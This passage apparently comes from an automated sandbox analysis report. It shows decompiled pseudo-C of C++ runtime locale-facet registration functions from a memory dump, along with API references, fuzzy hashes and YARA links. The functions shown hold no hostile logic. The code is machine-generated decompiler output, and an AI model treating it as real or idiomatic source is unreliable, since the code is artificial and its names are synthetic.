							_t103 = E6DDB171B( *((intOrPtr*)(_t110 + 8)), _t54);
							__eflags = _t103;
							if(_t103 != 0) {
								L12:
								E6DDD66BA(_t110 - 0x14);
								return E6DDF0075(_t103);
							} else {
								__eflags = _t106;
								if(_t106 == 0) {
									_push( *((intOrPtr*)(_t110 + 8)));
									_push(_t110 - 0x10);
									__eflags = E6DDE162A(__ebx, _t89, __edx, _t103, _t106) - 0xffffffff;
									if(__eflags == 0) {
										_t93 = _t110 - 0x20;
										E6DDB1438(_t93);
										E6DDF3D74(_t110 - 0x20, 0x6de93504);
										asm("int3");
										E6DDF00AC(0x6de3851f, _t79, _t103, _t106, 4);
										_t107 = _t93;
										 *(_t110 - 0x10) = _t107;
										 *((intOrPtr*)(_t107 + 4)) =  *((intOrPtr*)(_t110 + 0xc));
										_push( *((intOrPtr*)(_t110 + 0x14)));
										_t35 = _t110 - 4;
										 *_t35 =  *(_t110 - 4) & 0x00000000;
										__eflags =  *_t35;
										 *_t107 = 0x6de3c0c4;
										 *((char*)(_t107 + 0x28)) =  *((intOrPtr*)(_t110 + 0x10));
										E6DDE542F(_t79, _t93, __edx, _t103, _t107,  *_t35);
										return E6DDF0075(_t107,  *((intOrPtr*)(_t110 + 8)));
									} else {
										_t103 =  *(_t110 - 0x10);
										 *(_t110 - 0x10) = _t103;
										 *(_t110 - 4) = 1;
										E6DDD6FD3(__eflags, _t103);
										 *0x6de3a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t103 + 4))))();
										 *0x6de96dd0 = _t103;
										goto L12;
									}
								} else {
									_t103 = _t106;
									goto L12;
								}
							}
						} else {
							_t102 =  *(_t110 - 0x10);
							 *(_t110 - 0x10) = _t102;
							 *(_t110 - 4) = 1;
							E6DDD6FD3(__eflags, _t102);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t102 + 4))))();
							 *0x6de96e00 = _t102;
							goto L5;
						}
					} else {
						_t102 = _t105;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6DDDFBEA
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDFBF4
int.LIBCPMT ref: 6DDDFC0B

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

std::_Facet_Register.LIBCPMT ref: 6DDDFC45
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDFC65
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDFC83

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 4a442c5eadf99eaf13806179c74916b9bbcdb0963d065960e9d0006820467f5c
Instruction ID: a9d47e72587acc106a881c1edc03ff837dfe81169af9d293e6b95feb553fb368
Opcode Fuzzy Hash: 4a442c5eadf99eaf13806179c74916b9bbcdb0963d065960e9d0006820467f5c
Instruction Fuzzy Hash: D411A075908119DBCF01FB64C880BFDB7B5AF44318F264009F911AB290DFB49A01CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDFB3D, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E6DDDFB3D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t55;
				signed int _t56;
				void* _t68;
				void* _t81;
				signed int _t131;
				signed int _t144;
				signed int _t145;
				signed int _t147;
				signed int _t148;
				signed int _t149;
				signed int _t150;
				void* _t154;

				_t141 = __edx;
				_t110 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t154 - 0x14, 0);
				_t147 =  *0x6de96dcc; // 0x0
				 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
				 *(_t154 - 0x10) = _t147;
				_t55 = E6DDB161C(0x6de96d80);
				_t113 =  *((intOrPtr*)(_t154 + 8));
				_t56 = E6DDB171B( *((intOrPtr*)(_t154 + 8)), _t55);
				_t143 = _t56;
				if(_t56 != 0) {
					L5:
					E6DDD66BA(_t154 - 0x14);
					return E6DDF0075(_t143);
				} else {
					if(_t147 == 0) {
						_push( *((intOrPtr*)(_t154 + 8)));
						_push(_t154 - 0x10);
						__eflags = E6DDE1558(__ebx, _t113, __edx, _t143, _t147) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438(_t154 - 0x20);
							E6DDF3D74(_t154 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t143, _t147, 0x14);
							E6DDD6653(_t154 - 0x14, 0);
							_t148 =  *0x6de96e00; // 0x0
							 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
							 *(_t154 - 0x10) = _t148;
							_t68 = E6DDB161C(0x6de96dac);
							_t120 =  *((intOrPtr*)(_t154 + 8));
							_t144 = E6DDB171B( *((intOrPtr*)(_t154 + 8)), _t68);
							__eflags = _t144;
							if(_t144 != 0) {
								L12:
								E6DDD66BA(_t154 - 0x14);
								return E6DDF0075(_t144);
							} else {
								__eflags = _t148;
								if(_t148 == 0) {
									_push( *((intOrPtr*)(_t154 + 8)));
									_push(_t154 - 0x10);
									__eflags = E6DDE15C4(_t110, _t120, __edx, _t144, _t148) - 0xffffffff;
									if(__eflags == 0) {
										E6DDB1438(_t154 - 0x20);
										E6DDF3D74(_t154 - 0x20, 0x6de93504);
										asm("int3");
										E6DDF00AC(0x6de383cf, _t110, _t144, _t148, 0x14);
										E6DDD6653(_t154 - 0x14, 0);
										_t149 =  *0x6de96dd0; // 0x0
										 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
										 *(_t154 - 0x10) = _t149;
										_t81 = E6DDB161C(0x6de96d60);
										_t127 =  *((intOrPtr*)(_t154 + 8));
										_t145 = E6DDB171B( *((intOrPtr*)(_t154 + 8)), _t81);
										__eflags = _t145;
										if(_t145 != 0) {
											L19:
											E6DDD66BA(_t154 - 0x14);
											return E6DDF0075(_t145);
										} else {
											__eflags = _t149;
											if(_t149 == 0) {
												_push( *((intOrPtr*)(_t154 + 8)));
												_push(_t154 - 0x10);
												__eflags = E6DDE162A(_t110, _t127, __edx, _t145, _t149) - 0xffffffff;
												if(__eflags == 0) {
													_t131 = _t154 - 0x20;
													E6DDB1438(_t131);
													E6DDF3D74(_t154 - 0x20, 0x6de93504);
													asm("int3");
													E6DDF00AC(0x6de3851f, _t110, _t145, _t149, 4);
													_t150 = _t131;
													 *(_t154 - 0x10) = _t150;
													 *((intOrPtr*)(_t150 + 4)) =  *((intOrPtr*)(_t154 + 0xc));
													_push( *((intOrPtr*)(_t154 + 0x14)));
													_t49 = _t154 - 4;
													 *_t49 =  *(_t154 - 4) & 0x00000000;
													__eflags =  *_t49;
													 *_t150 = 0x6de3c0c4;
													 *((char*)(_t150 + 0x28)) =  *((intOrPtr*)(_t154 + 0x10));
													E6DDE542F(_t110, _t131, _t141, _t145, _t150,  *_t49);
													return E6DDF0075(_t150,  *((intOrPtr*)(_t154 + 8)));
												} else {
													_t145 =  *(_t154 - 0x10);
													 *(_t154 - 0x10) = _t145;
													 *(_t154 - 4) = 1;
													E6DDD6FD3(__eflags, _t145);
													 *0x6de3a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t145 + 4))))();
													 *0x6de96dd0 = _t145;
													goto L19;
												}
											} else {
												_t145 = _t149;
												goto L19;
											}
										}
									} else {
										_t144 =  *(_t154 - 0x10);
										 *(_t154 - 0x10) = _t144;
										 *(_t154 - 4) = 1;
										E6DDD6FD3(__eflags, _t144);
										 *0x6de3a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t144 + 4))))();
										 *0x6de96e00 = _t144;
										goto L12;
									}
								} else {
									_t144 = _t148;
									goto L12;
								}
							}
						} else {
							_t143 =  *(_t154 - 0x10);
							 *(_t154 - 0x10) = _t143;
							 *(_t154 - 4) = 1;
							E6DDD6FD3(__eflags, _t143);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t143 + 4))))();
							 *0x6de96dcc = _t143;
							goto L5;
						}
					} else {
						_t143 = _t147;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6DDDFB44
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDFB4E
int.LIBCPMT ref: 6DDDFB65

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

std::_Facet_Register.LIBCPMT ref: 6DDDFB9F
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDFBBF
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDFBDD

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 0f0a13ce8ead1fb1b6acc6818fc48d9863d8d27d4da0f0b3f7540db5e2871e5c
Instruction ID: 92ac90ec6d29870d8730f7e506127764c0181f985cc4cd0c1530a2e1bd5af46c
Opcode Fuzzy Hash: 0f0a13ce8ead1fb1b6acc6818fc48d9863d8d27d4da0f0b3f7540db5e2871e5c
Instruction Fuzzy Hash: 2811CEB2808119DBCF05FB64C850ABEB774AF84318F27040AF611AB290DF74AA01CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDFA97, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6DDDFA97(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t69;
				signed int _t70;
				void* _t82;
				void* _t95;
				void* _t108;
				signed int _t169;
				signed int _t185;
				signed int _t186;
				signed int _t187;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				signed int _t193;
				void* _t198;

				_t182 = __edx;
				_t141 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t198 - 0x14, 0);
				_t189 =  *0x6de96dfc; // 0x0
				 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
				 *(_t198 - 0x10) = _t189;
				_t69 = E6DDB161C(0x6de96da8);
				_t144 =  *((intOrPtr*)(_t198 + 8));
				_t70 = E6DDB171B( *((intOrPtr*)(_t198 + 8)), _t69);
				_t184 = _t70;
				if(_t70 != 0) {
					L5:
					E6DDD66BA(_t198 - 0x14);
					return E6DDF0075(_t184);
				} else {
					if(_t189 == 0) {
						_push( *((intOrPtr*)(_t198 + 8)));
						_push(_t198 - 0x10);
						__eflags = E6DDE14EC(__ebx, _t144, __edx, _t184, _t189) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438(_t198 - 0x20);
							E6DDF3D74(_t198 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t184, _t189, 0x14);
							E6DDD6653(_t198 - 0x14, 0);
							_t190 =  *0x6de96dcc; // 0x0
							 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
							 *(_t198 - 0x10) = _t190;
							_t82 = E6DDB161C(0x6de96d80);
							_t151 =  *((intOrPtr*)(_t198 + 8));
							_t185 = E6DDB171B( *((intOrPtr*)(_t198 + 8)), _t82);
							__eflags = _t185;
							if(_t185 != 0) {
								L12:
								E6DDD66BA(_t198 - 0x14);
								return E6DDF0075(_t185);
							} else {
								__eflags = _t190;
								if(_t190 == 0) {
									_push( *((intOrPtr*)(_t198 + 8)));
									_push(_t198 - 0x10);
									__eflags = E6DDE1558(_t141, _t151, __edx, _t185, _t190) - 0xffffffff;
									if(__eflags == 0) {
										E6DDB1438(_t198 - 0x20);
										E6DDF3D74(_t198 - 0x20, 0x6de93504);
										asm("int3");
										E6DDF00AC(0x6de383cf, _t141, _t185, _t190, 0x14);
										E6DDD6653(_t198 - 0x14, 0);
										_t191 =  *0x6de96e00; // 0x0
										 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
										 *(_t198 - 0x10) = _t191;
										_t95 = E6DDB161C(0x6de96dac);
										_t158 =  *((intOrPtr*)(_t198 + 8));
										_t186 = E6DDB171B( *((intOrPtr*)(_t198 + 8)), _t95);
										__eflags = _t186;
										if(_t186 != 0) {
											L19:
											E6DDD66BA(_t198 - 0x14);
											return E6DDF0075(_t186);
										} else {
											__eflags = _t191;
											if(_t191 == 0) {
												_push( *((intOrPtr*)(_t198 + 8)));
												_push(_t198 - 0x10);
												__eflags = E6DDE15C4(_t141, _t158, __edx, _t186, _t191) - 0xffffffff;
												if(__eflags == 0) {
													E6DDB1438(_t198 - 0x20);
													E6DDF3D74(_t198 - 0x20, 0x6de93504);
													asm("int3");
													E6DDF00AC(0x6de383cf, _t141, _t186, _t191, 0x14);
													E6DDD6653(_t198 - 0x14, 0);
													_t192 =  *0x6de96dd0; // 0x0
													 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
													 *(_t198 - 0x10) = _t192;
													_t108 = E6DDB161C(0x6de96d60);
													_t165 =  *((intOrPtr*)(_t198 + 8));
													_t187 = E6DDB171B( *((intOrPtr*)(_t198 + 8)), _t108);
													__eflags = _t187;
													if(_t187 != 0) {
														L26:
														E6DDD66BA(_t198 - 0x14);
														return E6DDF0075(_t187);
													} else {
														__eflags = _t192;
														if(_t192 == 0) {
															_push( *((intOrPtr*)(_t198 + 8)));
															_push(_t198 - 0x10);
															__eflags = E6DDE162A(_t141, _t165, _t182, _t187, _t192) - 0xffffffff;
															if(__eflags == 0) {
																_t169 = _t198 - 0x20;
																E6DDB1438(_t169);
																E6DDF3D74(_t198 - 0x20, 0x6de93504);
																asm("int3");
																E6DDF00AC(0x6de3851f, _t141, _t187, _t192, 4);
																_t193 = _t169;
																 *(_t198 - 0x10) = _t193;
																 *((intOrPtr*)(_t193 + 4)) =  *((intOrPtr*)(_t198 + 0xc));
																_push( *((intOrPtr*)(_t198 + 0x14)));
																_t63 = _t198 - 4;
																 *_t63 =  *(_t198 - 4) & 0x00000000;
																__eflags =  *_t63;
																 *_t193 = 0x6de3c0c4;
																 *((char*)(_t193 + 0x28)) =  *((intOrPtr*)(_t198 + 0x10));
																E6DDE542F(_t141, _t169, _t182, _t187, _t193,  *_t63);
																return E6DDF0075(_t193,  *((intOrPtr*)(_t198 + 8)));
															} else {
																_t187 =  *(_t198 - 0x10);
																 *(_t198 - 0x10) = _t187;
																 *(_t198 - 4) = 1;
																E6DDD6FD3(__eflags, _t187);
																 *0x6de3a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t187 + 4))))();
																 *0x6de96dd0 = _t187;
																goto L26;
															}
														} else {
															_t187 = _t192;
															goto L26;
														}
													}
												} else {
													_t186 =  *(_t198 - 0x10);
													 *(_t198 - 0x10) = _t186;
													 *(_t198 - 4) = 1;
													E6DDD6FD3(__eflags, _t186);
													 *0x6de3a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t186 + 4))))();
													 *0x6de96e00 = _t186;
													goto L19;
												}
											} else {
												_t186 = _t191;
												goto L19;
											}
										}
									} else {
										_t185 =  *(_t198 - 0x10);
										 *(_t198 - 0x10) = _t185;
										 *(_t198 - 4) = 1;
										E6DDD6FD3(__eflags, _t185);
										 *0x6de3a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t185 + 4))))();
										 *0x6de96dcc = _t185;
										goto L12;
									}
								} else {
									_t185 = _t190;
									goto L12;
								}
							}
						} else {
							_t184 =  *(_t198 - 0x10);
							 *(_t198 - 0x10) = _t184;
							 *(_t198 - 4) = 1;
							E6DDD6FD3(__eflags, _t184);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t184 + 4))))();
							 *0x6de96dfc = _t184;
							goto L5;
						}
					} else {
						_t184 = _t189;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6DDDFA9E
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDFAA8
int.LIBCPMT ref: 6DDDFABF

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

std::_Facet_Register.LIBCPMT ref: 6DDDFAF9
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDFB19
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDFB37

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 5fc3d0fa7fb59c04805897762f0a3a720383c609969c3c6e0f3634ec20bf2073
Instruction ID: e84f50caa7cc29c33f6f960e22e3ac69ec8b3bedaca0da897098b19e45adb461
Opcode Fuzzy Hash: 5fc3d0fa7fb59c04805897762f0a3a720383c609969c3c6e0f3634ec20bf2073
Instruction Fuzzy Hash: 4911A076908119DBCF01FBA4C850ABEB775AF44318F27401AF621AB290DF74AA018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDF41B, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6DDDF41B(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t209;
				signed int _t210;
				void* _t222;
				void* _t235;
				void* _t248;
				void* _t261;
				void* _t274;
				void* _t287;
				void* _t300;
				void* _t313;
				void* _t326;
				void* _t339;
				void* _t352;
				void* _t365;
				void* _t378;
				signed int _t549;
				signed int _t595;
				signed int _t596;
				signed int _t597;
				signed int _t598;
				signed int _t599;
				signed int _t600;
				signed int _t601;
				signed int _t602;
				signed int _t603;
				signed int _t604;
				signed int _t605;
				signed int _t606;
				signed int _t607;
				signed int _t609;
				signed int _t610;
				signed int _t611;
				signed int _t612;
				signed int _t613;
				signed int _t614;
				signed int _t615;
				signed int _t616;
				signed int _t617;
				signed int _t618;
				signed int _t619;
				signed int _t620;
				signed int _t621;
				signed int _t622;
				signed int _t623;
				void* _t638;

				_t592 = __edx;
				_t451 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t638 - 0x14, 0);
				_t609 =  *0x6de96df0; // 0x0
				 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
				 *(_t638 - 0x10) = _t609;
				_t209 = E6DDB161C(0x6de96d9c);
				_t454 =  *((intOrPtr*)(_t638 + 8));
				_t210 = E6DDB171B( *((intOrPtr*)(_t638 + 8)), _t209);
				_t594 = _t210;
				if(_t210 != 0) {
					L5:
					E6DDD66BA(_t638 - 0x14);
					return E6DDF0075(_t594);
				} else {
					if(_t609 == 0) {
						_push( *((intOrPtr*)(_t638 + 8)));
						_push(_t638 - 0x10);
						__eflags = E6DDE1057(__ebx, _t454, __edx, _t594, _t609) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438(_t638 - 0x20);
							E6DDF3D74(_t638 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t594, _t609, 0x14);
							E6DDD6653(_t638 - 0x14, 0);
							_t610 =  *0x6de96dc0; // 0x0
							 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
							 *(_t638 - 0x10) = _t610;
							_t222 = E6DDB161C(0x6de96d74);
							_t461 =  *((intOrPtr*)(_t638 + 8));
							_t595 = E6DDB171B( *((intOrPtr*)(_t638 + 8)), _t222);
							__eflags = _t595;
							if(_t595 != 0) {
								L12:
								E6DDD66BA(_t638 - 0x14);
								return E6DDF0075(_t595);
							} else {
								__eflags = _t610;
								if(_t610 == 0) {
									_push( *((intOrPtr*)(_t638 + 8)));
									_push(_t638 - 0x10);
									__eflags = E6DDE10BF(_t451, _t461, __edx, _t595, _t610) - 0xffffffff;
									if(__eflags == 0) {
										E6DDB1438(_t638 - 0x20);
										E6DDF3D74(_t638 - 0x20, 0x6de93504);
										asm("int3");
										E6DDF00AC(0x6de383cf, _t451, _t595, _t610, 0x14);
										E6DDD6653(_t638 - 0x14, 0);
										_t611 =  *0x6de96df8; // 0x0
										 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
										 *(_t638 - 0x10) = _t611;
										_t235 = E6DDB161C(0x6de96da4);
										_t468 =  *((intOrPtr*)(_t638 + 8));
										_t596 = E6DDB171B( *((intOrPtr*)(_t638 + 8)), _t235);
										__eflags = _t596;
										if(_t596 != 0) {
											L19:
											E6DDD66BA(_t638 - 0x14);
											return E6DDF0075(_t596);
										} else {
											__eflags = _t611;
											if(_t611 == 0) {
												_push( *((intOrPtr*)(_t638 + 8)));
												_push(_t638 - 0x10);
												__eflags = E6DDE1127(_t451, _t468, __edx, _t596, _t611) - 0xffffffff;
												if(__eflags == 0) {
													E6DDB1438(_t638 - 0x20);
													E6DDF3D74(_t638 - 0x20, 0x6de93504);
													asm("int3");
													E6DDF00AC(0x6de383cf, _t451, _t596, _t611, 0x14);
													E6DDD6653(_t638 - 0x14, 0);
													_t612 =  *0x6de96df4; // 0x0
													 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
													 *(_t638 - 0x10) = _t612;
													_t248 = E6DDB161C(0x6de96da0);
													_t475 =  *((intOrPtr*)(_t638 + 8));
													_t597 = E6DDB171B( *((intOrPtr*)(_t638 + 8)), _t248);
													__eflags = _t597;
													if(_t597 != 0) {
														L26:
														E6DDD66BA(_t638 - 0x14);
														return E6DDF0075(_t597);
													} else {
														__eflags = _t612;
														if(_t612 == 0) {
															_push( *((intOrPtr*)(_t638 + 8)));
															_push(_t638 - 0x10);
															__eflags = E6DDE11AB(_t451, _t475, _t592, _t597, _t612) - 0xffffffff;
															if(__eflags == 0) {
																E6DDB1438(_t638 - 0x20);
																E6DDF3D74(_t638 - 0x20, 0x6de93504);
																asm("int3");
																E6DDF00AC(0x6de383cf, _t451, _t597, _t612, 0x14);
																E6DDD6653(_t638 - 0x14, 0);
																_t613 =  *0x6de96dc8; // 0x0
																 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
																 *(_t638 - 0x10) = _t613;
																_t261 = E6DDB161C(0x6de96d7c);
																_t482 =  *((intOrPtr*)(_t638 + 8));
																_t598 = E6DDB171B( *((intOrPtr*)(_t638 + 8)), _t261);
																__eflags = _t598;
																if(_t598 != 0) {
																	L33:
																	E6DDD66BA(_t638 - 0x14);
																	return E6DDF0075(_t598);
																} else {
																	__eflags = _t613;
																	if(_t613 == 0) {
																		_push( *((intOrPtr*)(_t638 + 8)));
																		_push(_t638 - 0x10);
																		__eflags = E6DDE1230(_t451, _t482, _t592, _t598, _t613) - 0xffffffff;
																		if(__eflags == 0) {
																			E6DDB1438(_t638 - 0x20);
																			E6DDF3D74(_t638 - 0x20, 0x6de93504);
																			asm("int3");
																			E6DDF00AC(0x6de383cf, _t451, _t598, _t613, 0x14);
																			E6DDD6653(_t638 - 0x14, 0);
																			_t614 =  *0x6de96dc4; // 0x0
																			 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
																			 *(_t638 - 0x10) = _t614;
																			_t274 = E6DDB161C(0x6de96d78);
																			_t489 =  *((intOrPtr*)(_t638 + 8));
																			_t599 = E6DDB171B( *((intOrPtr*)(_t638 + 8)), _t274);
																			__eflags = _t599;
																			if(_t599 != 0) {
																				L40:
																				E6DDD66BA(_t638 - 0x14);
																				return E6DDF0075(_t599);
																			} else {
																				__eflags = _t614;
																				if(_t614 == 0) {
																					_push( *((intOrPtr*)(_t638 + 8)));
																					_push(_t638 - 0x10);
																					__eflags = E6DDE12B4(_t451, _t489, _t592, _t599, _t614) - 0xffffffff;
																					if(__eflags == 0) {
																						E6DDB1438(_t638 - 0x20);
																						E6DDF3D74(_t638 - 0x20, 0x6de93504);
																						asm("int3");
																						E6DDF00AC(0x6de383cf, _t451, _t599, _t614, 0x14);
																						E6DDD6653(_t638 - 0x14, 0);
																						_t615 =  *0x6de96dd8; // 0x0
																						 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
																						 *(_t638 - 0x10) = _t615;
																						_t287 = E6DDB161C(0x6de96d84);
																						_t496 =  *((intOrPtr*)(_t638 + 8));
																						_t600 = E6DDB171B( *((intOrPtr*)(_t638 + 8)), _t287);
																						__eflags = _t600;
																						if(_t600 != 0) {
																							L47:
																							E6DDD66BA(_t638 - 0x14);
																							return E6DDF0075(_t600);
																						} else {
																							__eflags = _t615;
																							if(_t615 == 0) {
																								_push( *((intOrPtr*)(_t638 + 8)));
																								_push(_t638 - 0x10);
																								__eflags = E6DDE1339(_t451, _t496, _t592, _t600, _t615) - 0xffffffff;
																								if(__eflags == 0) {
																									E6DDB1438(_t638 - 0x20);
																									E6DDF3D74(_t638 - 0x20, 0x6de93504);
																									asm("int3");
																									E6DDF00AC(0x6de383cf, _t451, _t600, _t615, 0x14);
																									E6DDD6653(_t638 - 0x14, 0);
																									_t616 =  *0x6de96db0; // 0x0
																									 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
																									 *(_t638 - 0x10) = _t616;
																									_t300 = E6DDB161C(0x6de96d64);
																									_t503 =  *((intOrPtr*)(_t638 + 8));
																									_t601 = E6DDB171B( *((intOrPtr*)(_t638 + 8)), _t300);
																									__eflags = _t601;
																									if(_t601 != 0) {
																										L54:
																										E6DDD66BA(_t638 - 0x14);
																										return E6DDF0075(_t601);
																									} else {
																										__eflags = _t616;
																										if(_t616 == 0) {
																											_push( *((intOrPtr*)(_t638 + 8)));
																											_push(_t638 - 0x10);
																											__eflags = E6DDE13A1(_t451, _t503, _t592, _t601, _t616) - 0xffffffff;
																											if(__eflags == 0) {
																												E6DDB1438(_t638 - 0x20);
																												E6DDF3D74(_t638 - 0x20, 0x6de93504);
																												asm("int3");
																												E6DDF00AC(0x6de383cf, _t451, _t601, _t616, 0x14);
																												E6DDD6653(_t638 - 0x14, 0);
																												_t617 =  *0x6de96ddc; // 0x0
																												 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
																												 *(_t638 - 0x10) = _t617;
																												_t313 = E6DDB161C(0x6de96d88);
																												_t510 =  *((intOrPtr*)(_t638 + 8));
																												_t602 = E6DDB171B( *((intOrPtr*)(_t638 + 8)), _t313);
																												__eflags = _t602;
																												if(_t602 != 0) {
																													L61:
																													E6DDD66BA(_t638 - 0x14);
																													return E6DDF0075(_t602);
																												} else {
																													__eflags = _t617;
																													if(_t617 == 0) {
																														_push( *((intOrPtr*)(_t638 + 8)));
																														_push(_t638 - 0x10);
																														__eflags = E6DDE1409(_t451, _t510, _t592, _t602, _t617) - 0xffffffff;
																														if(__eflags == 0) {
																															E6DDB1438(_t638 - 0x20);
																															E6DDF3D74(_t638 - 0x20, 0x6de93504);
																															asm("int3");
																															E6DDF00AC(0x6de383cf, _t451, _t602, _t617, 0x14);
																															E6DDD6653(_t638 - 0x14, 0);
																															_t618 =  *0x6de96de0; // 0x0
																															 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
																															 *(_t638 - 0x10) = _t618;
																															_t326 = E6DDB161C(0x6de96d8c);
																															_t517 =  *((intOrPtr*)(_t638 + 8));
																															_t603 = E6DDB171B( *((intOrPtr*)(_t638 + 8)), _t326);
																															__eflags = _t603;
																															if(_t603 != 0) {
																																L68:
																																E6DDD66BA(_t638 - 0x14);
																																return E6DDF0075(_t603);
																															} else {
																																__eflags = _t618;
																																if(_t618 == 0) {
																																	_push( *((intOrPtr*)(_t638 + 8)));
																																	_push(_t638 - 0x10);
																																	__eflags = E6DDE1471(_t451, _t517, _t592, _t603, _t618) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6DDB1438(_t638 - 0x20);
																																		E6DDF3D74(_t638 - 0x20, 0x6de93504);
																																		asm("int3");
																																		E6DDF00AC(0x6de383cf, _t451, _t603, _t618, 0x14);
																																		E6DDD6653(_t638 - 0x14, 0);
																																		_t619 =  *0x6de96dfc; // 0x0
																																		 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
																																		 *(_t638 - 0x10) = _t619;
																																		_t339 = E6DDB161C(0x6de96da8);
